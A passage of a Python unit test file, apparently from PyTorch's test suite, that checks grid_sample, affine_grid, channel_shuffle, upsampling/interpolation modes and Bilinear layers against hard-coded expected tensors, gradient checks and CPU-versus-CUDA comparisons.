[0.906250, 7.2822485, 4.625, 5.0000052, 10.00000]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[3.1822524, 6.239998, 5.0000, 4.8709273, 9.00000],
[1.7812500, 6.703594, 5.0000, 5.0760007, 8.21875]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[2.7993753, 6.6050020, 4.25, 4.7138715, 10.269531],
[0.8125000, 7.2822485, 4.25, 5.0000052, 9.332031]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
else:
raise AssertionError("missing groundtruth test for interpolation mode '{}'".format(mode))
output = F.grid_sample(input, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(output, groundtruth, atol=1e-5, rtol=0,
msg="groundtruth comparison failed for mode={}, "
"padding_mode={}".format(mode, padding_mode))
# See NOTE [ grid_sample CPU fallback ]
output = torch._grid_sampler_2d_cpu_fallback(
input.float(), grid.float(),
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners)
self.assertEqual(output, groundtruth.float(), atol=1e-5, rtol=0)
# explicit check for gradient edge cases
input = torch.arange(0., 5).expand((1, 1, 5, 5)).requires_grad_()
grid = torch.tensor(
[[[1.0, 1.0], [1.0, -1.0], [0.8, 0.8], [0.8, -0.8]],
[[-1.0, -1.0], [-1.0, 1.0], [-0.8, -0.8], [-0.8, 0.8]]]).view(1, 2, 4, 2).requires_grad_()
if mode == 'bilinear':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[[[-8., -8.], [-8., 0.], [2., 0.], [2., 0.]],
[[2., 0.], [2., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-5., -5.], [-5., 5.], [-10., -10.], [-10., 10.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [2., 0.], [2., 0.]],
[[0., 0.], [0., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [2., 0.], [2., 0.]],
[[0., 0.], [0., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
else:
raise AssertionError("missing gradient groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'nearest':
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif mode == 'bicubic':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[[[-4.5, -6.], [-4.5, 6.], [2.725679, 0.740878], [2.725679, -0.740878]],
[[1.5, 0.], [1.5, 0.], [1.927921, -0.05688], [1.927921, 0.05688]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-5.859375, -5.888672], [-5.859375, 5.888672], [-5.6250, -7.5000], [-5.6250, 7.5000]],
[[-0.234375, -0.263672], [-0.234375, 0.263672], [1.8750, 0.], [1.8750, 0.]]]]
).view(1, 2, 4, 2)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[[[1.5, 0.], [1.5, 0.], [1.74, 0.], [1.74, 0.]],
[[1.5, 0.], [1.5, 0.], [1.74, 0.], [1.74, 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0.46875, 0.], [-0.46875, 0.], [1.8750, 0.], [1.8750, 0.]],
[[-0.46875, 0.], [-0.46875, 0.], [1.8750, 0.], [1.8750, 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[[[0., 0.], [0., 0.], [1.92, 0.], [1.92, 0.]],
[[0., 0.], [0., 0.], [1.92, 0.], [1.92, 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[0., 0.], [0., 0.], [1.875, 0.], [1.875, 0.]],
[[0., 0.], [0., 0.], [1.875, 0.], [1.875, 0.]]]]).view(1, 2, 4, 2)
else:
raise AssertionError("missing gradient groundtruth test for padding mode '{}'".format(padding_mode))
else:
raise AssertionError("missing gradient groundtruth test for interpolation mode '{}'".format(mode))
F.grid_sample(input, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners).sum().backward()
self.assertEqual(grid.grad, groundtruth, atol=1e-5, rtol=0,
msg="gradient groundtruth comparison failed for mode={}, "
"padding_mode={}".format(mode, padding_mode))
# See NOTE [ grid_sample CPU fallback ]
grid.grad.zero_()
torch._grid_sampler_2d_cpu_fallback(
input.float(), grid.float(),
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners).sum().backward()
self.assertEqual(grid.grad, groundtruth, atol=1e-5, rtol=0)
# do gradcheck
N = random.randint(2, 8)
C = random.randint(2, 6)
H = random.randint(2, 8)
W = random.randint(2, 8)
input = torch.randn(N, C, H, W, requires_grad=True)
grid = torch.randn(N, H, W, 2, requires_grad=True)
self.assertTrue(gradcheck(
lambda inp, grid: F.grid_sample(inp, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners),
(input, grid)))
test(N, C, H, W, mode, padding_mode, align_corners=align_corners)
if TEST_CUDNN:
with cudnn.flags(enabled=False):
test(N, C, H, W, mode, padding_mode, align_corners=align_corners)
def test_grid_sample_3d(self):
def test(N, C, D, H, W, mode, padding_mode, align_corners):
def test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners):
input_cpu = torch.randn(C, N, ID, IH, IW).transpose(0, 1).requires_grad_()
grid_cpu = torch.randn(D, N, H, W, 3).transpose(0, 1).requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertTrue(out_cpu.size() == torch.Size([N, C, D, H, W]))
gradients = torch.randn_like(out_cpu)
out_cpu.backward(gradients)
if TEST_CUDA:
input_cuda = input_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
grid_cuda = grid_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
out_cuda.backward(gradients.cuda())
self.assertEqual(input_cpu.grad, input_cuda.grad)
self.assertEqual(grid_cpu.grad, grid_cuda.grad, atol=5e-5, rtol=0)
# check that zero-dimensional input strides don't error out
base_input = torch.randn(N, C, 1, IH, IW)
input_cpu = base_input.expand_as(input_cuda).requires_grad_()
grid_cpu = torch.randn(N, D, H, W, 3, requires_grad=True)
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
input_cuda = base_input.cuda().expand_as(input_cuda).requires_grad_()
grid_cuda = grid_cpu.detach().cuda().requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
# test same size output
test_shape(N, C, D, H, W, D, H, W, mode, padding_mode, align_corners)
# test larger output
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(ID + 1, 10)
H = random.randint(IH + 1, 10)
W = random.randint(IW + 1, 10)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# test smaller output
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(2, ID)
H = random.randint(2, IH)
W = random.randint(2, IW)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# test 1x1 inpput
N = random.randint(2, 7)
C = random.randint(2, 7)
ID = 1
IH = 1
IW = 1
H = random.randint(2, 5)
W = random.randint(2, 5)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# testing empty grid
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
W = random.randint(3, IW + 2)
test_shape(N, C, ID, IH, IW, D, 0, W, mode, padding_mode, align_corners)
# testing empty channel
N = random.randint(2, 7)
ID = random.randint(2, 5)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(N, 0, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# testing empty batch
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(0, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
for mode in ('bilinear', 'nearest'):
for padding_mode in ('zeros', 'border', 'reflection'):
for align_corners in (True, False):
# do gradcheck
N = random.randint(2, 5)
C = random.randint(2, 4)
D = random.randint(2, 5)
H = random.randint(2, 5)
W = random.randint(2, 5)
input = torch.randn(N, C, D, H, W, requires_grad=True)
grid = torch.randn(N, D, H, W, 3, requires_grad=True)
self.assertTrue(gradcheck(
lambda inp, grid: F.grid_sample(inp, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners),
(input, grid)))
test(N, C, D, H, W, mode, padding_mode, align_corners)
def test_affine_grid(self):
# test known input on CPU
input = torch.arange(1., 7).view(1, 2, 3)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2]), align_corners=True)
groundtruth = torch.tensor(
[[[0., -3.], [2., 5.]], [[4., 7.], [6., 15.]]]).view(1, 2, 2, 2)
self.assertEqual(output, groundtruth)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2]), align_corners=False)
groundtruth = torch.tensor(
[[[1.5, 1.5], [2.5, 5.5]], [[3.5, 6.5], [4.5, 10.5]]]).view(1, 2, 2, 2)
self.assertEqual(output, groundtruth)
for align_corners in (True, False):
# do gradcheck
N = random.randint(1, 8)
C = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, H, W])
inp = torch.randn(N, 2, 3, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
self.assertTrue(gradcheck(
lambda inp: F.affine_grid(inp, sz, align_corners=align_corners),
(inp,)))
# test CPU against CUDA
if TEST_CUDA:
N = random.randint(1, 8)
C = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, H, W])
for align_corners in (True, False):
input_cpu = torch.randn(N, 2, 3, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
out_cpu = F.affine_grid(input_cpu, sz, align_corners=align_corners)
gradients = torch.randn(out_cpu.size())
out_cpu.backward(gradients)
input_gpu = input_cpu.detach().cuda().requires_grad_()
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
out_cuda = F.affine_grid(input_gpu, sz, align_corners=align_corners)
out_cuda.backward(gradients.cuda())
self.assertEqual(out_cpu, out_cuda)
self.assertEqual(input_cpu.grad, input_gpu.grad)
def test_affine_grid_3d(self):
# test known input on CPU
input = torch.arange(1., 13).view(1, 3, 4)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2, 2]), align_corners=True)
groundtruth = torch.tensor(
[[[[[-2., -10., -18.], [0., 0., 0.]], [[2., 2., 2.], [4., 12., 20.]]],
[[[4., 4., 4.], [6., 14., 22.]], [[8., 16., 24.], [10., 26., 42.]]]]]).view(1, 2, 2, 2, 3)
self.assertEqual(output, groundtruth)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2, 2]), align_corners=False)
groundtruth = torch.tensor(
[[[[[1., -1., -3.], [2., 4., 6.]], [[3., 5., 7.], [4., 10., 16.]]],
[[[4., 6., 8.], [5., 11., 17.]], [[6., 12., 18.], [7., 17., 27.]]]]]).view(1, 2, 2, 2, 3)
self.assertEqual(output, groundtruth)
for align_corners in (True, False):
# do gradcheck
N = random.randint(1, 8)
C = random.randint(1, 8)
D = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, D, H, W])
inp = torch.randn(N, 3, 4, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
self.assertTrue(gradcheck(
lambda inp: F.affine_grid(inp, sz, align_corners=align_corners),
(inp,)))
# test CPU against CUDA
if TEST_CUDA:
N = random.randint(1, 8)
C = random.randint(1, 8)
D = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, D, H, W])
for align_corners in (True, False):
input_cpu = torch.randn(N, 3, 4, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
out_cpu = F.affine_grid(input_cpu, sz, align_corners=align_corners)
gradients = torch.randn(out_cpu.size())
out_cpu.backward(gradients)
input_gpu = input_cpu.detach().cuda().requires_grad_()
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # python2 requires this so other tests can trigger
out_cuda = F.affine_grid(input_gpu, sz, align_corners=align_corners)
out_cuda.backward(gradients.cuda())
self.assertEqual(out_cpu, out_cuda)
self.assertEqual(input_cpu.grad, input_gpu.grad)
def test_channel_shuffle(self):
# 3D tensor
x = torch.tensor(
[[[1, 2],
[5, 6],
[9, 10],
[13, 14],
]]
)
y_ref = torch.tensor(
[[[1, 2],
[9, 10],
[5, 6],
[13, 14],
]]
)
# ChannelsFirst
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# ChannelsLast not supported for 3dim
# 4D tensor
x = torch.tensor(
[[[[1, 2],
[3, 4]],
[[5, 6],
[7, 8]],
[[9, 10],
[11, 12]],
[[13, 14],
[15, 16]],
]]
)
y_ref = torch.tensor(
[[[[1, 2],
[3, 4]],
[[9, 10],
[11, 12]],
[[5, 6],
[7, 8]],
[[13, 14],
[15, 16]],
]]
)
# ChannelsFirst NCHW
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# ChannelsLast NHWC
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x.contiguous(memory_format=torch.channels_last), 2)
self.assertEqual(len(w), 0)
y = y.contiguous(memory_format=torch.contiguous_format)
self.assertEqual(y, y_ref)
# 5D tensor
x = torch.tensor(
[[[[[1, 2],
[3, 4]]],
[[[5, 6],
[7, 8]]],
[[[9, 10],
[11, 12]]],
[[[13, 14],
[15, 16]]],
]]
)
y_ref = torch.tensor(
[[[[[1, 2],
[3, 4]]],
[[[9, 10],
[11, 12]]],
[[[5, 6],
[7, 8]]],
[[[13, 14],
[15, 16]]],
]]
)
# ChannelsFirst NCHW
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x, 2)
self.assertEqual(len(w), 0)
self.assertEqual(y, y_ref)
# ChannelsLast NHWC
with warnings.catch_warnings(record=True) as w:
y = F.channel_shuffle(x.contiguous(memory_format=torch.channels_last_3d), 2)
self.assertEqual(len(w), 0)
y = y.contiguous(memory_format=torch.contiguous_format)
self.assertEqual(y, y_ref)
def test_upsamplingNearest1d(self):
m = nn.Upsample(size=4, mode='nearest')
in_t = torch.ones(1, 1, 2)
in_uint8_t = torch.ones(1, 1, 2, dtype=torch.uint8)
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
out_uint8_t = m(in_uint8_t)
self.assertEqual(torch.ones(1, 1, 4), out_t.data)
self.assertEqual(torch.ones(1, 1, 4, dtype=torch.uint8), out_uint8_t.data)
input = torch.randn(1, 1, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
def test_upsamplingLinear1d(self):
for align_corners in [True, False]:
kwargs = dict(mode='linear', align_corners=align_corners)
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
m = nn.Upsample(scale_factor=scale_factor, **kwargs)
in_t = torch.ones(1, 1, 2)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
self.assertEqual(torch.ones(1, 1, out_size), out_t.data)
input = torch.randn(1, 1, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), (input,))
def test_upsamplingLinear1d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='linear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9)
in_t_9[:, :, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5])
self.assertEqual(out_t_9[:, :, :15], out_t_5)
def test_upsamplingBicubic2d(self):
# test output against known input: align_corners=False result must match opencv
in_t = torch.arange(8.).view(1, 2, 2, 2)
expected_out_t = torch.tensor(
[[[[-0.31641, 0.01562, 0.56250, 0.89453],
[0.34766, 0.67969, 1.22656, 1.55859],
[1.44141, 1.77344, 2.32031, 2.65234],
[2.10547, 2.43750, 2.98438, 3.31641]],
[[3.68359, 4.01562, 4.56250, 4.89453],
[4.34766, 4.67969, 5.22656, 5.55859],
[5.44141, 5.77344, 6.32031, 6.65234],
[6.10547, 6.43750, 6.98438, 7.31641]]]])
out_t = F.interpolate(in_t, scale_factor=2, mode='bicubic', align_corners=False)
torch.set_printoptions(precision=5)
self.assertEqual(out_t, expected_out_t, atol=1e-5, rtol=0)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for align_corners in [True, False]:
kwargs = dict(mode='bicubic', align_corners=align_corners)
# test float scale factor up & downsampling
for device in device_list:
for scale_factor in [0.5, 1, 1.5, 2]:
in_t = torch.ones(2, 2, 2, 2).to(device)
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
self.assertEqual(torch.ones(2, 2, out_size, out_size), out_t.data,
atol=1e-5, rtol=0)
input = torch.randn(2, 2, 2, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsampling_not_recompute_scale_factor(self):
# test output against known input: result must match opencv
in_t = torch.arange(8.).view(1, 2, 2, 2)
expected_out_t = torch.tensor(
[[[[-0.32725, -0.08843, 0.37933, 0.79744],
[0.15039, 0.38921, 0.85697, 1.27508],
[1.08591, 1.32473, 1.79249, 2.21060],
[1.92213, 2.16095, 2.62871, 3.04682]],
[[3.67275, 3.91157, 4.37933, 4.79744],
[4.15039, 4.38921, 4.85697, 5.27508],
[5.08591, 5.32473, 5.79249, 6.21060],
[5.92213, 6.16095, 6.62871, 7.04682]]]])
if IS_PPC:
# Both OpenCV and PyTorch give a slightly different result on PPC
expected_out_t = torch.tensor(
[[[[-0.32725, -0.08843, 0.37933, 0.79744],
[0.15039, 0.38921, 0.85697, 1.27508],
[1.08591, 1.32473, 1.79249, 2.21060],
[1.92212, 2.16094, 2.62870, 3.04681]],
[[3.67275, 3.91157, 4.37933, 4.79743],
[4.15039, 4.38921, 4.85697, 5.27508],
[5.08591, 5.32473, 5.79249, 6.21059],
[5.92212, 6.16094, 6.62870, 7.04680]]]])
out_t = F.interpolate(in_t, scale_factor=2.3, mode='bicubic', align_corners=False, recompute_scale_factor=False)
torch.set_printoptions(precision=5)
self.assertEqual(out_t, expected_out_t, atol=1e-4, rtol=0)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for align_corners in [True, False]:
kwargs = dict(mode='bicubic', align_corners=align_corners)
# test float scale factor up & downsampling
for device in device_list:
for scale_factor in [0.6, 1.6, 2.3]:
in_t = torch.ones(2, 2, 2, 2).to(device)
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
self.assertEqual(torch.ones(2, 2, out_size, out_size), out_t.data, atol=1e-5, rtol=0)
input = torch.randn(2, 2, 2, 2, requires_grad=True)
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsamplingBilinear2d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='bilinear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9, 9)
in_t_9[:, :, :4, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5, :5])
self.assertEqual(out_t_9[:, :, :15, :15], out_t_5)
def test_upsamplingNearest3d(self):
for memory_format in [torch.contiguous_format, torch.channels_last_3d]:
m = nn.Upsample(size=4, mode='nearest')
in_t = torch.ones(1, 2, 2, 2, 2).contiguous(memory_format=memory_format)
in_uint8_t = torch.ones(1, 2, 2, 2, 2, dtype=torch.uint8).contiguous(memory_format=memory_format)
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
out_uint8_t = m(in_uint8_t)
self.assertEqual(torch.ones(1, 2, 4, 4, 4), out_t)
self.assertEqual(torch.ones(1, 2, 4, 4, 4, dtype=torch.uint8), out_uint8_t)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, 2, requires_grad=True).contiguous(memory_format=memory_format)
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
# Assert that cpu and cuda handle channels_last memory format in the same way
# https://github.com/pytorch/pytorch/issues/54590
if torch.cuda.is_available():
a = torch.ones(2, 2, 2, 3, 4, requires_grad=True).contiguous(memory_format=torch.channels_last_3d)
# make the data asymmetric; ensure that cuda/cpu handle channels_last appropriately.
a[1][1][1][2][2] = a[1][1][1][2][3] = 0
out_cpu = torch.nn.functional.interpolate(a, scale_factor=2, mode='nearest')
out_cuda = torch.nn.functional.interpolate(a.to('cuda'), scale_factor=2, mode='nearest')
self.assertEqual(out_cpu, out_cuda.to('cpu'))
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a])
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a.to('cuda')])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [a.to('cuda')])
def test_upsamplingTrilinear3d(self):
for align_corners in [True, False]:
kwargs = dict(mode='trilinear', align_corners=align_corners)
for memory_format in [torch.contiguous_format, torch.channels_last_3d]:
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
m = nn.Upsample(scale_factor=scale_factor, **kwargs)
in_t = torch.ones(1, 2, 2, 2, 2).contiguous(memory_format=memory_format)
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = m(in_t)
self.assertEqual(torch.ones(1, 2, out_size, out_size, out_size), out_t.data)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, 2, requires_grad=True)
self.assertEqual(
F.interpolate(input, (out_size, out_size, out_size), **kwargs),
F.interpolate(input, scale_factor=scale_factor, **kwargs))
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
gradgradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
def test_upsamplingTrilinear3d_spatial_invariance(self):
m = nn.Upsample(scale_factor=3, mode='trilinear', align_corners=False)
in_t_9 = torch.zeros(1, 1, 9, 9, 9)
in_t_9[:, :, :4, :4, :4].normal_()
with warnings.catch_warnings(record=True) as w:
out_t_9 = m(in_t_9)
out_t_5 = m(in_t_9[:, :, :5, :5, :5])
self.assertEqual(out_t_9[:, :, :15, :15, :15], out_t_5)
def test_upsampling_small_scale(self):
m = torch.nn.Upsample(scale_factor=0.5, mode="bilinear")
in_t = torch.arange(1, 5, dtype=torch.float64).reshape(1, 1, 2, 2)
out_t = m(in_t)
expected_out_t = torch.tensor([[[[2.5]]]])
self.assertEqual(expected_out_t, out_t)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_interpolate_illegal_memory_access(self):
in_s = 45
out_s = 14
input = torch.ones((1, 1, in_s), device='cuda', requires_grad=True)
# note we allocated grad_output to be larger so out of bound access
# woudl be visible in grad_input
grad = torch.ones((1, 1, out_s * 2), device='cuda', requires_grad=True)
grad = grad[:, :, :out_s]
input_ref = input.detach().cpu().requires_grad_()
grad_ref = grad.cpu()
out = F.interpolate(input, size=(out_s,), mode='nearest')
out.backward(grad)
out_ref = F.interpolate(input_ref, size=(out_s,), mode='nearest')
out_ref.backward(grad_ref)
self.assertEqual(out_ref, out)
self.assertEqual(input_ref.grad, input.grad)
def test_interpolate(self):
def _test_interpolate_helper(in_t, scale_factor, layer):
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
dim = len(in_t.shape) - 2
out_shape = [1, 1] + [out_size] * dim
with warnings.catch_warnings(record=True) as w:
out_t = layer(in_t)
self.assertEqual(torch.ones(out_shape), out_t)
self.assertEqual(
F.interpolate(in_t, (out_size,) * dim, **kwargs),
F.interpolate(in_t, scale_factor=scale_factor, **kwargs))
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [in_t], nondet_tol=GRADCHECK_NONDET_TOL)
gradgradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [in_t], nondet_tol=GRADCHECK_NONDET_TOL)
def _make_input(dim, device):
size = [1, 1]
size += [2] * dim
return torch.ones(size, requires_grad=True, device=device)
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
for scale_factor in [0.5, 1.5, 2]:
for mode in ['nearest', 'area']:
kwargs = dict(mode=mode)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
for input in [_make_input(1, device), _make_input(2, device), _make_input(3, device)]:
_test_interpolate_helper(input, scale_factor, m)
for align_corners in [True, False]:
kwargs = dict(mode='linear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(1, device), scale_factor, m)
kwargs = dict(mode='bilinear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(2, device), scale_factor, m)
kwargs = dict(mode='bicubic', align_corners=align_corners)
def m(t):
return F.interpolate(t, scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(2, device), scale_factor, m)
kwargs = dict(mode='trilinear', align_corners=align_corners)
m = nn.Upsample(scale_factor=scale_factor, **kwargs).to(device)
_test_interpolate_helper(_make_input(3, device), scale_factor, m)
def test_linear_broadcasting(self):
m = nn.Linear(5, 8)
inp = torch.randn(2, 3, 5)
expected = m(inp.view(6, 5)).view(2, 3, 8)
self.assertEqual(expected, m(inp))
def test_bilinear(self):
module = nn.Bilinear(10, 10, 8)
input1 = torch.randn(4, 10, requires_grad=True)
input2 = torch.randn(4, 10, requires_grad=True)
grad_output = torch.randn(4, 8)
res = module(input1, input2)
expected = (torch.einsum("bi,kij,bj->bk", input1, module.weight, input2) +
module.bias)
self.assertEqual(res, expected)
grads = torch.autograd.grad(res, [module.weight, module.bias, input1, input2], grad_output)
grads_expected = torch.autograd.grad(expected, [module.weight, module.bias, input1, input2], grad_output)
for g, ge in zip(grads, grads_expected):
self.assertEqual(g, ge)
def test_bilinear_non_contiguous(self):
module = nn.Bilinear(7, 7, 5)
input1 = torch.randn(4, 7, 10, requires_grad=True)
input2 = torch.randn(4, 7, 10, requires_grad=True)
input1_tp = input1.transpose(1, 2)
input2_tp = input2.transpose(1, 2)
grad_output = torch.randn(4, 10, 5)
def run(input1_tp, input2_tp):
input1.grad = input2.grad = None
output = module(input1_tp, input2_tp)
output.backward(grad_output)
return output.data, input1.grad.data, input2.grad.data
out_nc, g1_nc, g2_nc = run(input1_tp, input2_tp)
input1_tp = input1_tp.contiguous()
input2_tp = input2_tp.contiguous()
out, g1, g2 = run(input1_tp, input2_tp)
self.assertEqual(out, out_nc)
self.assertEqual(g1, g1_nc)
self.assertEqual(g2, g2_nc)
def test_bilinear_no_bias(self):
module = nn.Bilinear(10, 10, 8)
module_no_bias = nn.Bilinear(10, 10, 8, False)
module.bias.data.zero_()
module.weight.data.copy_(module_no_bias.weight)
input1 = torch.randn(4, 10, requires_grad=True)
input2 = torch.randn(4, 10, requires_grad=True)
grad_output = torch.randn(4, 8)
def run(net):
input1.grad = input2.grad = None
output = net(input1, input2)
output.backward(grad_output)
return output.data, input1.grad.data, input2.grad.data
out, g1, g2 = run(module)
out_nb, g1_nb, g2_nb = run(module_no_bias)
self.assertEqual(out, out_nb)
self.assertEqual(g1, g1_nb)
self.assertEqual(g2, g2_nb)
_assertGradAndGradgradChecks(self,
lambda x1, x2: F.bilinear(x1, x2, module_no_bias.weight, module_no_bias.bias),
(input1, input2))
def test_bilinear_broadcasting(self):
m = nn.Bilinear(5, 6, 8)
input1 = torch.randn(2, 3, 5)
input2 = torch.randn(2, 3, 6)
